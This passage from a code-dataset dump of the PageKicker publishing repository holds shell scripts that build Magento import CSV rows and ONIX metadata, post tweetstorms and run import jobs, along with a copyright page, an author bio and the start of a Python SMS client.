$metadatatargetpath$uuid\"/current-import.csv\"\n\n# backorders\n\necho -n \"0,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# use_config_backorders\n\necho -n \"1,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# min_sale_qty\n\necho -n \"1,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# use_config_min_sale_qty\n\necho -n \"1,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# max_sale_qty\n\necho -n \"0,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# use_config_max_sale_qty\n\necho -n \"1,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# is_in_stock\n\necho -n \"1,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# low_stock_date\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# notify_stock_qty\n\necho -n \"0,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# use_config_notify_stock_qty\n\necho -n \"1,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# manage_stock\n\necho -n \"0,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# use_config_manage_stock\n\necho -n \"1,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# stock_status_changed_auto\n\necho -n \"1,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# use_config_qty_increments\n\necho -n \"1,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# qty_increments\n\necho -n \"0,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# use_config_enable_qty_inc\n\necho -n \"1,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# enable_qty_increments\n\necho -n \"0,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# is_decimal_divided\n\necho -n \"0,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# stock_status_changed_automatically\n\necho -n \"1,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# use_config_enable_qty_increments\n\necho -n \"1,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# product_name\nbashsafe_product_name=$(echo \"$booktitle\" | sed -e 's/[|,&<>]/_/g')\n\necho -n \"$bashsafe_product_name,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# store_id\n\necho -n \"$storeids,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# product_type_id\n\necho -n \"downloadable,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# product_status_changed\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# product_changed_websites\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# gallery\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# gallery_label\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# related\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# upsell\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# crosssell\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# tier_prices\n\necho -n \"0,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# associated\n\necho -n \"0,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# bundle_options\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# grouped\n\necho -n \"0,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# group_price\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n\n# downloadable_options\n\n
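# with --dat set, the download links point at the analysis files (word cloud, acronyms, readability report, keywords, summary, montages); otherwise store \"builder\" link ids are written, and the ids differ by environment\nif [ \"$dat\" = \"yes\" ] ; 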
then\n\n\tlink1name=\"Poster_Sized_Word_Cloud\"\n\tlink2name=\"Candidate_Acronyms\"\n\tlink3name=\"Readability_Report\"\n\tlink4name=\"Keywords\"\n\tlink5name=\"Automatic_Summary\"\n\tlink6name=\"All_Images_Montage\"\n\tlink7name=\"Top_N_Images_Montage\"\n\tfilename1=\"$sku\"wordcloudbig.png\n\tfilename2=\"$sku\"acronyms.txt\n\tfilename3=\"$sku\"rr.pdf\n\tfilename4=\"$sku\"all_nouns.txt\n\tfilename5=\"$sku\"summary.txt\n\tfilename6=\"$sku\"montage.jpg\n\tfilename7=\"$sku\"montagetopn.jpg\n\n\tpipe=\"|\"\n\n\tif [ \"$montageur_success\" = 0 ] ; then\n\n\t\techo \"montageur ran successfully so adding links for montages to metadata\" | tee --append $xform_log\n\n\t\techo -n '\"'$link1name,0,9,file,$uuid/$filename1$pipe$link2name,0,9,file,$uuid/$filename2$pipe$link3name,0,9,file,$uuid/$filename3$pipe$link4name,0,9,file,$uuid/$filename4$pipe$link5name,0,9,file,$uuid/$filename5$pipe$link6name,0,9,file,$uuid/$filename6$pipe$link7name,0,9,file,$uuid/$filename7'\"'\",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n\n\telse\n\n\t\techo \"montageur did not run successfully so not adding links for montages\" | tee --append $xform_log\n\n\t\techo -n '\"'$link1name,0,9,file,$uuid/$filename1$pipe$link2name,0,9,file,$uuid/$filename2$pipe$link3name,0,9,file,$uuid/$filename3$pipe$link4name,0,9,file,$uuid/$filename4$pipe$link5name,0,9,file,$uuid/$filename5'\"'\",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n\tfi\n\nelse\n# note that file path is relative to media/import because that's where Magento (not SFB) assumes the file will be\n\n\t# echo -n '\"'$epublinkrichname,0,9,file,$uuid/$sku'linkrich.epub'$pipe$docxname,0,9,file,$uuid/$sku'.docx'$pipe$epublinkname,0,9,file,$uuid/$sku'plaintxt.epub'$pipe$mobilinkname,0,9,file,$uuid/$sku'.mobi'$pipe$pdflinkname,0,9,file,$uuid/\"$sku\"print_color.pdf'\"', >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n\tif [ \"$environment\" = \"Production\" ] ; then\n\n\t\techo -n '\"'$mobilinkname,0,9,builder,12$pipe$epublinkname,0,9,builder,9$pipe$docxlinkname,0,9,builder,10'\"', >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n\telif [ \"$environment\" = \"Staging\" ] ; then\n\n\t\techo -n '\"'$mobilinkname,0,9,builder,15$pipe$epublinkname,0,9,builder,13$pipe$docxlinkname,0,9,builder,14'\"', >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n\telse\n\n\techo -n '\"'$mobilinkname,0,9,builder,12$pipe$epublinkname,0,9,builder,9$pipe$docxlinkname,0,9,builder,10'\"', >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n\tfi\n\nfi\n\n# downloadable_sample_options\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# super_attribute_pricing\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# product_tags\n\n# . 
includes/keyword-reader\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# is_recurring\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n# image_label\n\necho -n '\"' >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n \"$booktitle cover\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n '\"' >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# small_image_label\n\necho -n '\"' >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n \"$booktitle small cover\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n '\"' >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# thumbnail_label\necho -n '\"' >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n \"$booktitle thumbnail\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n '\"' >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# job profile name\necho -n \"$jobprofilename,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# downloadable_additional_clogin\necho -n \"1,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# country of manufacture\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# weight\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# book types such as Reader, NodeHome, Spider, etc.\n\necho -n \"$booktype,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# seeds to catalog\n\necho -n '\"' >> $metadatatargetpath$uuid\"/current-import.csv\"\nprintf \"%s\" \"$(cat $TMPDIR$uuid/seeds/sorted.seedfile)\" | sed -e 's/\"/_/g' >> $metadatatargetpath$uuid\"/current-import.csv\"\necho -n '\"' >> $metadatatargetpath$uuid\"/current-import.csv\"\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# imprint\n\necho -n \"$imprint,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# customer id for revenue sharing\n\necho -n \"$customerid,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# safe product name\n\nsafe_product_name=$(echo \"$booktitle\" | sed -e 's/[^A-Za-z0-9._-]/_/g' | sed -e 's/,/_/g')\necho -n \"$safe_product_name,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# wikilang\necho -n \"$wikilang,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n#coverfont\n\necho -n \"$coverfont,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n#covercolor\n\necho -n \"$covercolor,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# final column uses plain echo (no -n) so the row ends with a newline\n\necho \"0\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n" }, { "alpha_fraction": 0.6959459185600281, "alphanum_fraction": 0.7030405402183533, "avg_line_length": 59.408164978027344, "blob_id": "faef5c53b613eb93612c239f1e6f3aa3753828de", "content_id": "3753828651f75ffa6bd0e9a7cf0bd32ffab321f6", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 2960, "license_type": "permissive", "max_line_length": 141, "num_lines": 49, "path": "/scripts/includes/write-ONIX-metadata.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "YYYYMMDD=`date +'%Y%m%d'`\n\nYYYYMMDDHHSS=`date +'%Y%m%d%k%M'`\n\nYYYY=`date +'%Y'`\n\n
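# builds the ONIX 2.1 message one element per echo; $dq is expected to hold a literal double-quote character for the XML header\necho \"<?xml version=\"$dq\"1.0\"$dq\"?>\" >> tmp/$uuid/onix-working.xml\necho \"<!DOCTYPE ONIXMessage SYSTEM 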
\"$dq\"http://www.editeur.org/onix/2.1/reference/onix-international.dtd\"$dq\">\" >> tmp/$uuid/onix-working.xml\necho \"<ONIXMessage>\" >> tmp/$uuid/onix-working.xml\necho \"<Header>\" >> tmp/$uuid/onix-working.xml\necho \" <FromCompany>PageKicker</FromCompany>\" >> tmp/$uuid/onix-working.xml\necho \" <FromPerson>[email protected]</FromPerson>\" >> tmp/$uuid/onix-working.xml\necho \" <SentDate>$YYYYMMDD</SentDate>\" >> tmp/$uuid/onix-working.xml\necho \" <DefaultLanguageOfText>eng</DefaultLanguageOfText>\" >> tmp/$uuid/onix-working.xml\necho \"</Header>\" >> tmp/$uuid/onix-working.xml\n echo \"<Product>\" >> tmp/$uuid/onix-working.xml\n echo \" <RecordReference>\"$sku\"</RecordReference>\" >> tmp/$uuid/onix-working.xml\n echo \" <NotificationType>03</NotificationType>\" >> tmp/$uuid/onix-working.xml\necho \" <ProductIdentifier>\" >> tmp/$uuid/onix-working.xml\necho \" <ProductIDType>15</ProductIDType>\" >> tmp/$uuid/onix-working.xml\n echo \" <IDValue>$ISBN</IDValue>\" >> tmp/$uuid/onix-working.xml\necho \" </ProductIdentifier>\" >> tmp/$uuid/onix-working.xml\necho \"<ProductForm>DG</ProductForm>\" >> tmp/$uuid/onix-working.xml\necho \"<EpubType>029</EpubType>\" >> tmp/$uuid/onix-working.xml\necho \"<EpubFormatDescription>Epub</EpubFormatDescription>\" >> tmp/$uuid/onix-working.xml\necho \"<Title>\" >> tmp/$uuid/onix-working.xml\necho \"<TitleType>01</TitleType>\" >> tmp/$uuid/onix-working.xml\necho \"<TitleText>$covertitle</TitleText>\" >> tmp/$uuid/onix-working.xml\necho \"</Title>\" >> tmp/$uuid/onix-working.xml\necho \"<Contributor>\" >> tmp/$uuid/onix-working.xml\necho \" <SequenceNumber>1</SequenceNumber>\" >> tmp/$uuid/onix-working.xml\necho \" <ContributorRole>A01</ContributorRole>\" >> tmp/$uuid/onix-working.xml\necho \" <NamesBeforeKey> \"$firstname\"</NamesBeforeKey>\" >> tmp/$uuid/onix-working.xml\necho \" <KeyNames>$lastname</KeyNames>\" >> tmp/$uuid/onix-working.xml\necho \"<BiographicalNote>\" >> tmp/$uuid/onix-working.xml\ncat \"$authorbio\" | html2text >> tmp/$uuid/onix-working.xml\necho \"</BiographicalNote>\" >> tmp/$uuid/onix-working.xml\necho \"</Contributor>\" >> tmp/$uuid/onix-working.xml\necho \"<Publisher>\" >> tmp/$uuid/onix-working.xml\necho \" <PublishingRole>01</PublishingRole>\" >> tmp/$uuid/onix-working.xml\necho \" <PublisherName>PageKicker</PublisherName>\" >> tmp/$uuid/onix-working.xml\necho \"</Publisher>\" >> tmp/$uuid/onix-working.xml\necho \"<SalesRights>\" >> tmp/$uuid/onix-working.xml\necho \" <SalesRightsType>01</SalesRightsType>\" >> tmp/$uuid/onix-working.xml\necho \" <RightsCountry>US GB </RightsCountry>\" >> tmp/$uuid/onix-working.xml\necho \" <RightsTerritory>WORLD</RightsTerritory>\" >> tmp/$uuid/onix-working.xml\necho \"</SalesRights>\" >> tmp/$uuid/onix-working.xml\necho \"</Product>\" >> tmp/$uuid/onix-working.xml\necho \"</ONIXMessage>\" >> tmp/$uuid/onix-working.xml\n" }, { "alpha_fraction": 0.6389414072036743, "alphanum_fraction": 0.6398865580558777, "avg_line_length": 49.380950927734375, "blob_id": "cfd191137683a7226194b2c7eaa029b3abda7cbb", "content_id": "eb2cc9c060b5493576e80d5b9741bcb48de235b6", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1058, "license_type": "permissive", "max_line_length": 304, "num_lines": 21, "path": "/scripts/includes/seedfortheday.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "# gets encylopedia content related to the current date\n\ntoday=$(date +%B\" \"%d)\n\nif [ -n \"$seedfortheday\" ] ; 
then\n echo \"seed for the day added to seedfile\"\n date +%B\" \"%d >> \"$TMPDIR$uuid/seeds/seedfortheday\"\n \"$PYTHON_BIN\" $scriptpath\"bin/wikifetcher.py\" \\\n --infile \"$TMPDIR$uuid/seeds/seedfortheday\" \\\n --outfile \"$TMPDIR$uuid/wiki/seedfortheday-raw.md\" \\\n --lang \"$wikilocale\"\n\n sed -e s/\\=\\=\\=\\=\\=/JQJQJQJQJQ/g -e s/\\=\\=\\=\\=/JQJQJQJQ/g -e s/\\=\\=\\=/JQJQJQ/g -e s/\\=\\=/JQJQ/g -e s/Edit\\ /\\ /g -e s/JQJQJQJQJQ/\\#\\#\\#\\#\\#/g -e s/JQJQJQJQ/\\#\\#\\#\\#/g -e s/JQJQJQ/\\#\\#\\#/g -e s/JQJQ/\\#\\#/g \"$TMPDIR\"$uuid/wiki/seedfortheday-raw.md | sed G > \"$TMPDIR\"$uuid/wiki/seedfortheday-postpend.md\n sed -i '2d' \"$TMPDIR$uuid/wiki/seedfortheday-postpend.md\"\n echo \" \" >> \"$TMPDIR$uuid/wiki/seedfortheday.md\"\n echo \" \" >> \"$TMPDIR$uuid/wiki/seedfortheday.md\"\n echo \"# On This Day $today\" >> \"$TMPDIR$uuid/wiki/seedfortheday.md\"\n cat \"$TMPDIR$uuid/wiki/seedfortheday-postpend.md\" >> \"$TMPDIR$uuid/wiki/seedfortheday.md\"\nelse\n echo \"no seed for the day\"\nfi\n" }, { "alpha_fraction": 0.681193470954895, "alphanum_fraction": 0.6925858855247498, "avg_line_length": 21.196786880493164, "blob_id": "65b5bdc3fcf86a178b15623c7d5b141f8168e0d2", "content_id": "fb0a1bd020ca5590c9b337d34bad2e87b970cd8d", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 5530, "license_type": "permissive", "max_line_length": 82, "num_lines": 249, "path": "/scripts/bin/tweetstorm.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n# sends out a tweetstorm\n\n# requires t cli client\n\n# accepts either text file or directory of decimator files\n\necho \"running $0\"\n\nstarttime=$(( `date +%s` ))\n\n# parse the command-line very stupidly\n\n\n. includes/set-variables\n\nif [ \"$environment\" = \"Production\" ] ; then\n\n . /opt/bitnami/apache2/htdocs/pk-production/production/conf/config.txt\n echo \"running prod config\" > ~/which_xform\n\nelse\n\n . /opt/bitnami/apache2/htdocs/pk-new/development/conf/config.txt\n echo \"running dev config\" > ~/which_xform\n\nfi\n\necho \"revision number in\" \"$environment\" \"is\" $SFB_VERSION\n\ncd $scriptpath\necho \"scriptpath is\" $scriptpath\n\nexport PATH=$PATH:/opt/bitnami/java/bin\n\necho \"PATH is\" $PATH\n# default values\n\nsleep_interval=60\n\n# command line processing \n\n\nwhile :\ndo\ncase $1 in\n--help | -\\?)\necho \"requires user to provide path to directory containing one or more txt files\"\nexit 0 # This is not an error, the user requested help, so do not exit status 1.\n;;\n\n--passuuid)\npassuuid=$2\nshift 2\n;;\n--passuuid=*)\npassuuid=${1#*=}\nshift\n;;\n--txtinfile)\ntxtinfile=$2\nshift 2\n;;\n--txtinfile=*)\ntxtinfile=${1#*=}\nshift\n;;\n--decimator_dir)\ndecimator_dir=$2\nshift 2\n;;\n--decimator_dir=*)\ndecimator_dir=${1#*=}\nshift\n;;\n--stormtype)\nstormtype=$2\nshift 2\n;;\n--stormtype=*)\nstormtype=$1{#*=}\nshift\n;;\n--sleep_interval)\nsleep_interval=$2\nshift 2\n;;\n--sleep_interval=*)\nsleep_interval=$1{#*=}\nshift\n;;\n--docname)\ndocname=$2\nshift 2\n;;\n--docname=*)\ndocname=$1{#*=}\nshift\n;;\n --) # End of all options\n\t shift\n\t break\n\t ;;\n\t-*)\n\t echo \"WARN: Unknown option (ignored): $1\" >&2\n\t shift\n\t ;;\n\t*) # no more options. Stop while loop\n\t break\n\t ;;\n\nesac\ndone\n\n# Suppose some options are required. Check that we got them.\n\necho \"stormtype is\" $stormtype\n\nif [ ! \"$stormtype\" ] ; then\n echo \"ERROR: option '--stormtype' not given. 
See --help\" >&2\n exit 1\nfi\n\nif [ ! \"$passuuid\" ] ; then\n\techo \"creating uuid\"\n\tuuid=$(python -c 'import uuid; print uuid.uuid1()')\n\techo \"uuid is\" $uuid | tee --append $xform_log\n\tmkdir -p -m 755 tmp/$uuid\nelse\n\tuuid=$passuuid\n\techo \"received uuid \" $uuid\nfi\n\n# processing begins\n\ncase \"$stormtype\" in\n\ntxtinput)\n\nif [ ! \"$txtinfile\" ] ; then\n echo \"ERROR: option '--txtinfile' not given. See --help\" >&2\n exit 1\nelse\n\techo \"going on to read txtinfile\"\nfi\n\necho \"txtinfile is \"$txtinfile\nwhile read -r line;\ndo\n\tnumber=$((number + 1))\n\tmessage=\"$number\"\" ... \"\"$line\"\n\techo \"message is\" $message\n\tt update \"$message\"\n\tsleep \"$sleep_interval\"\ndone < \"$txtinfile\"\n\n;;\n\ndecimator)\n\nif [ ! \"$decimator_dir\" ] ; then\n echo \"ERROR: option '--decimator_dir' not given. See --help\" >&2\n exit 1\nelse\n\techo \"going on to post decimator files\"\nfi\n\nmkdir -p -m 755 $scriptpath\"../pk-html/\"$uuid\ncp tmp/$uuid/home.png $scriptpath/../pk-html/$uuid/home.png\ncp tmp/$uuid/wordcloudslide.png $scriptpath/../pk-html/$uuid/wordcloudslide.png\ncp tmp/$uuid/montage.png $scriptpath/../pk-html/$uuid/montage.png\ncp tmp/$uuid/sum1.png $scriptpath/../pk-html/$uuid/sum1.png\ncp tmp/$uuid/sum2.png $scriptpath/../pk-html/$uuid/sum2.png\ncp tmp/$uuid/sum3.png $scriptpath/../pk-html/$uuid/sum3.png\ncp tmp/$uuid/pageburst.png $scriptpath/../pk-html/$uuid/pageburst.png\ncp tmp/$uuid/samplepages.png $scriptpath/../pk-html/$uuid/samplepages.png\ncp tmp/$uuid/keywords.png $scriptpath/../pk-html/$uuid/keywords.png\ncp tmp/$uuid/rrslide.png $scriptpath/../pk-html/$uuid/rrslide.png\n\nmogrify -resize 1650x1275 $scriptpath\"../pk-html/\"$uuid\"/*.png\"\n\nmsg_before=\"Decimating \"\"$docname\"\" Home \"\nurlwc=\"http://pagekicker.com/\"pk-new/development/pk-html/$uuid/home.png\nmessage=\"$msg_before\"\"$urlwc\"\nt update \"$message\"\nsleep \"$sleep_interval\"\n\nmsg_before=\"Decimating \"\"$docname\"\" Wordcloud \"\nurlwc=\"http://pagekicker.com/\"pk-new/development/pk-html/$uuid/wordcloudslide.png\nmessage=\"$msg_before\"\"$urlwc\"\nt update \"$message\"\nsleep \"$sleep_interval\"\n\nmsg_before=\"Decimating \"\"$docname\"\" Image Montage\"\nurlwc=\"http://pagekicker.com/\"pk-new/development/pk-html/$uuid/montage.png\nmessage=\"$msg_before\"\"$urlwc\"\nt update \"$message\"\nsleep \"$sleep_interval\"\n\nmsg_before=\"Decimating \"\"$docname\"\" Sentence 1 \"\nurlwc=\"http://pagekicker.com/\"pk-new/development/pk-html/$uuid/sum1.png\nmessage=\"$msg_before\"\"$urlwc\"\nt update \"$message\"\nsleep \"$sleep_interval\"\n\nmsg_before=\"Decimating \"\"$docname\"\" Sentence 2 \"\nurlwc=\"http://pagekicker.com/\"pk-new/development/pk-html/$uuid/sum2.png\nmessage=\"$msg_before\"\"$urlwc\"\nt update \"$message\"\nsleep \"$sleep_interval\"\n\nmsg_before=\"Decimating \"\"$docname\"\" Sentence 3 \"\nurlwc=\"http://pagekicker.com/\"pk-new/development/pk-html/$uuid/sum3.png\nmessage=\"$msg_before\"\"$urlwc\"\nt update \"$message\"\nsleep \"$sleep_interval\"\n\nmsg_before=\"Decimating \"\"$docname\"\" Page Burst \"\nurlwc=\"http://pagekicker.com/\"pk-new/development/pk-html/$uuid/pageburst.png\nmessage=\"$msg_before\"\"$urlwc\"\nt update \"$message\"\nsleep \"$sleep_interval\"\n\nmsg_before=\"Decimating \"\"$docname\"\" Sample Pages\"\nurlwc=\"http://pagekicker.com/\"pk-new/development/pk-html/$uuid/samplepages.png\nmessage=\"$msg_before\"\"$urlwc\"\nt update \"$message\"\nsleep \"$sleep_interval\"\n\nmsg_before=\"Decimating \"\"$docname\"\" 
Keywords\"\nurlwc=\"http://pagekicker.com/\"pk-new/development/pk-html/$uuid/keywords.png\nmessage=\"$msg_before\"\"$urlwc\"\nt update \"$message\"\nsleep \"$sleep_interval\"\n\nmsg_before=\"Decimating \"\"$docname \" \" Readability Report \"\nurlwc=\"http://pagekicker.com/\"pk-new/development/pk-html/$uuid/rrslide.png\nmessage=\"$msg_before\"\"$urlwc\"\nt update \"$message\"\nsleep \"$sleep_interval\"\n;;\n*)\n\techo \"no storm type given\"\n;;\nesac\n\nexit\n0\n\n\n\n" }, { "alpha_fraction": 0.7347062230110168, "alphanum_fraction": 0.7383403778076172, "avg_line_length": 29, "blob_id": "99242b3b0e6a5d6c7b92d50c147d85cbefbed237", "content_id": "77c85dfb8596c1af05bd5b5b0bf2303a060363cf", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1651, "license_type": "permissive", "max_line_length": 151, "num_lines": 55, "path": "/scripts/receiving_dock.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "\n#!bin/bash\n\n# script that manages imports into Magento\n\n# get configuration variables\n\nif shopt -q login_shell ; then\n\n\tif [ ! -f \"$HOME\"/.pagekicker/config.txt ]; then\n\t\techo \"config file not found, creating /home/<user>/.pagekicker, put config file there\"\n\t\tmkdir -p -m 755 \"$HOME\"/.pagekicker\n\t\techo \"exiting\"\n\t\texit 1\n\telse\n\t\t. \"$HOME\"/.pagekicker/config.txt\n\t\techo \"read config file from login shell $HOME\"\"/.pagekicker/config.txt\"\n\tfi\nelse\n\t. /home/$(whoami)/.pagekicker/config.txt #hard-coding /home is a hack\n\techo \"read config file from nonlogin shell /home/$(whoami)/.pagekicker/config.txt\"\nfi\n\n# runs when cron job is triggered every 30 minutes\n\n# check if the importer is available\n\nwhile read backofthetruck\ndo\n\n\techo \"wheeling job #\" $backofthetruck \"onto the receiving dock\"\n\n\techo \"metadatarget path is\" $metadatatargetpath\n\tcp $metadatatargetpath$backofthetruck/current-import.csv $metadatatargetpath\"current-import.csv\"\n\techo \"lifting the boxes off the truck and putting them on the conveyor belt\"\n\n\t# echo \"opening the pod bay door\"\n\t# echo $SFB_MAGENTO_HOME $SFB_PHP_BIN $scriptpath\n\n\t\n\tcd $SFB_MAGENTO_HOME ; $SFB_PHP_BIN $scriptpath\"bin/import_cron.php\"\n\n\timportrows=$(grep 'admin' var/import/current-import.csv | wc -l)\n\n\tcd $scriptpath\n\n\techo \"ran import script and submitted \" $importrows \"jobs (some may be dupes) for import to the Magento store\" | tee --append \"$logdir\"import_log.txt\n\n\ndone<$scriptpath\"import_status/manifest.csv\"\n\nrm $scriptpath\"import_status/manifest.csv\"\n\necho \"the empty truck has pulled away from the dock, we are waiting for the next truck to arrive\" | tee --append \"$logdir\"import_log.txt\n\nexit\n" }, { "alpha_fraction": 0.6666666865348816, "alphanum_fraction": 0.7749999761581421, "avg_line_length": 16, "blob_id": "7eb99514511eefc103cb3e5668406645665ba0c1", "content_id": "ac831257216981aa4fc666f02862c30f20f9eaac", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 120, "license_type": "permissive", "max_line_length": 50, "num_lines": 7, "path": "/conf/jobprofiles/imprints/pagekicker/pkcopyrightpage.md", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "PageKicker\n\[email protected]\n\n1521 Martha Avenue, Ann Arbor, Michigan, USA 48103\n\nFront & back matter copyright PageKicker 2014\n\n" }, { "alpha_fraction": 0.5302663445472717, 
"alphanum_fraction": 0.6125907897949219, "avg_line_length": 10.44444465637207, "blob_id": "ad04930487ca1220d26fe990fcb98fd8113d86d0", "content_id": "374760c36020c9186983bbeceaa2eee3cca6c3e5", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 413, "license_type": "permissive", "max_line_length": 34, "num_lines": 36, "path": "/scripts/includes/pricing-zero.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#pricing logic\n\n# echo \"doccount is\" $doccount\n\necho \"price is \" $price\necho \"doccount is \"$doccount\n\nif [ \"$doccount\" -lt 9 ] ; then\n\n\tprice=0.00\n\nelif [ $doccount -lt 19 ] ; then\n\n\tprice=0.00\n\nelif [ $doccount -lt 49 ] ; then\n\n\tprice=0.00\n\nelif [ $doccount -lt 99 ] ; then\n\n\tprice=0.00\n\nelif [ $doccount -lt 249 ] ; then\n\n\tprice=0.00\n\nelif [ $doccount -lt 499 ] ; then\n\n\tprice=0.00\n\nelse\n\n\tprice=0.00\n\nfi\n\n" }, { "alpha_fraction": 0.7809523940086365, "alphanum_fraction": 0.7851851582527161, "avg_line_length": 944, "blob_id": "51b206befe430142101f20fd489510a19f57d8a5", "content_id": "e0c8876099b0754bda49c5db0cf4c8a63e96b754", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "HTML", "length_bytes": 945, "license_type": "permissive", "max_line_length": 944, "num_lines": 1, "path": "/conf/jobprofiles/authorbios/Hemingway.html", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "This authorial persona is named in honor of the publisher's late grandmother, Marta Barnes Lamar, a Texan born in 1900 who was a feisty, red-haired female copywriter in the New York of the Roaring Twenties. Among other things, she worked on a campaign for <a href=\"http://www.textilehistory.org/CheneyBrothersSilk.html\">Cheyney Brothers Silk</a>, for whom she commissioned a set of unique posters by <a href=\"http://en.wikipedia.org/wiki/Georgia_O'Keeffe\"> Georgia O'Keeffe</a>. Like Hemingway, she liked short, punchy writing.<p>In later life, she lived in New Orleans, where she was the host of a long-running garden show on the local PBS station. She was often found in her backyard rain forest in the Garden District whacking away at overgrowth with her trusty (and frightening!) 
machete.<p>Marta writes on many topics for Nimble, but her special publishing interests are the history of the Twenties and Thirties, Texas, New Orleans, and gardening.<p>\n" }, { "alpha_fraction": 0.7246376872062683, "alphanum_fraction": 0.737520158290863, "avg_line_length": 30.049999237060547, "blob_id": "c992014b0a5f496a6114a193a7afa68b0a28e9ab", "content_id": "a462fcddbb9d5bc8042128032904195f09a69be4", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 621, "license_type": "permissive", "max_line_length": 79, "num_lines": 20, "path": "/scripts_python_3/bitcoin/bitcoin-sms-server/sms-client.py", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\nimport urllib.parse\n\nfrom two1.wallet import Wallet\nfrom two1.bitrequests import 